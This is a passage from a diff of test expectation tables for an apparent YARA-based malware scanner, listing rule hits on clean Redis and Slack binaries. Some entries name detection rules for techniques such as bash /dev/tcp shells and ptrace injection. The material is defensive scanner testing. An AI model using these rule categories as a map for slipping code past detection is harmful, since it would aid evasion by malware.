[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | -| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | -| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | 
[/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) |
+| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
+| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) |
+| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) |
+| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) |
+| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) |
+| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) |
+| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) |
+| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) |
+| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) |
+| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) |
+| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) |
+| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) |
+| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) |
+| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) |
+| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) |
+| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) |
+| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) |
+| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) |
+| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) |
+| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
+| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) |
+| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) |
+| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) |
+| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) |
+| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
+| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) |
+| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) |
+| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) |
+| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
+| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) |
+| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) |
+| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) |
+| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a 
file | [flock](https://github.com/search?q=flock&type=code) |
+| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) |
+| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) |
+| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) |
+| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
+| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) |
+| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) |
+| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) |
+| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) |
+| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) |
+| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) |
+| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple
index f025f01ea..c8ae90917 100644
--- a/tests/linux/clean/rules.json.simple
+++ b/tests/linux/clean/rules.json.simple
@@ -21,7 +21,7 @@ data/compression/bzip2: low
 data/compression/lzma: low
 data/compression/zstd: low
 data/encoding/base64: low
-discover/system/network: high
+discover/system/network: medium
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
@@ -31,7 +31,6 @@ evasion/file/prefix: medium
 evasion/logging/acct: low
 evasion/process_injection/readelf: medium
 exec/plugin: low
-exec/shell/bash_dev_tcp: high
 exec/shell/bash_dev_udp: medium
 exec/shell/nohup: medium
 exec/system_controls/apparmor: medium
@@ -57,6 +56,7 @@ impact/exploit/cve: medium
 impact/remote_access/iptables: medium
 net/dns/servers: low
 net/download: medium
+net/ftp/t: low
 net/http/cookies: medium
 net/socket/connect: medium
 net/tcp/sftp: medium
diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md
index 6656a00a5..d21573c90 100644
--- a/tests/linux/clean/slack.md
+++ b/tests/linux/clean/slack.md
@@ -9,9 +9,9 @@
 | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) |
 | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s)
[https://%s](https://%s) |
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[endpoint_port](https://github.com/search?q=endpoint_port&type=code)
[firstIp](https://github.com/search?q=firstIp&type=code)
[hIp](https://github.com/search?q=hIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[multi_port](https://github.com/search?q=multi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[quiche_ip](https://github.com/search?q=quiche_ip&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[required_ip](https://github.com/search?q=required_ip&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
